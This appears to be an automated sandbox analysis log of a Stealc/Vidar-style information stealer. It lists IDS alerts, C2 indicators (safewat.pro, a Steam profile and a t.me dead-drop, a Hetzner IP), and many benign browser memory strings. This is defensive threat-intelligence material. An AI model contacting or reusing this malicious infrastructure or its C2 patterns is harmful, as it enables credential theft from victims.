              Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:56277 -> 5.75.215.154:443
              Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199824159981
              Source: global traffic TCP traffic: 192.168.2.4:56040 -> 162.159.36.2:53
              Source: global traffic HTTP traffic detected: GET /sok33tn HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
              Source: Joe Sandbox View IP Address: 149.154.167.99
              Source: Joe Sandbox View IP Address: 239.255.255.250
              Source: Joe Sandbox View ASN Name: HETZNER-ASDE
              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_00403C79
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0 | Host: safewat.pro | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: global traffic DNS traffic detected: DNS query: t.me
              Source: global traffic DNS traffic detected: DNS query: safewat.pro
              Source: global traffic DNS traffic detected: DNS query: www.google.com
              Source: global traffic DNS traffic detected: DNS query: apis.google.com
              Source: global traffic DNS traffic detected: DNS query: play.google.com
              Source: unknown HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----v37ycbaai58qimg479hv | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0 | Host: safewat.pro | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/490188
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901DM
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937DM
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
              Source: chrome.exe, 00000005.00000002.2175835689.00006D8C00644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
              Source: chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036ty
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
              Source: chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229DM
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
              Source: chrome.exe, 00000005.00000002.2174913785.00006D8C0031C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
              Source: chrome.exe, 00000005.00000002.2175865435.00006D8C00660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
              Source: chrome.exe, 00000005.00000002.2175865435.00006D8C00660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117m
              Source: chrome.exe, 00000005.00000002.2174032465.00006D8C0009A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
              Source: chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
